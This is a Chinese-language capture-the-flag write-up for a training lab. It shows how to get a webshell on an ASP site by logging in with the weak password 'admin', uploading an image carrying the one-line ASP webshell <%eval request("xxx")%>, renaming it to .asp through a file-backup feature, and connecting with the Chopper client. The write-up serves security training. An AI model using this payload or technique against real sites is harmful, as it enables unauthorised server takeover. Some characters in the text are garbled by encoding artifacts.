文件備份拿webshell(asp中很多站仍然存在的致命漏洞)
想要拿到webshell,有很多種方法,今天列舉一種方法,一時間沒找到什么好的例子,忽然在墨者學院找到了一道題,一起來看看吧。。。

題目.png
就是這道題
我們打開靶場環(huán)境

1.png
點開,進入,發(fā)現(xiàn)需要管理員才能進去,我們開始嘗試進入,

2.png
發(fā)現(xiàn)這是一句弱口令,密碼admin,輕松進入。。。。。。
進去之后我們看到了這個頁面,打開。

3.png
看到下面有個文件上傳,我們開始嘗試上傳文件
asp一句話木馬:<%eval request("xxx")%>
隨便上傳一個jpg文件(必須帶有asp木馬)之后返回一個路徑。我們復制這個路徑

4.png
之后文件備份就開始了

6.png
上面的是剛才復制的路徑,下面的是我們隨便起的名字,因為是asp的腳本,我們索性取asp后綴,點擊備份之后,看到返回一個路徑,嘿嘿 。。
然后我們訪問以下這個路徑

7.png
我這個只是什么都沒有的一句話改的后綴。你們可以上傳圖片馬,但是訪問時千萬不要有無效字符
然后我們就可以嘗試用剛才創(chuàng)造的webshell來解決這個問題了。
菜刀連接

8.png
在我們可愛的地方找到了這個結果。。。。點開后拿到我們需要的墨者key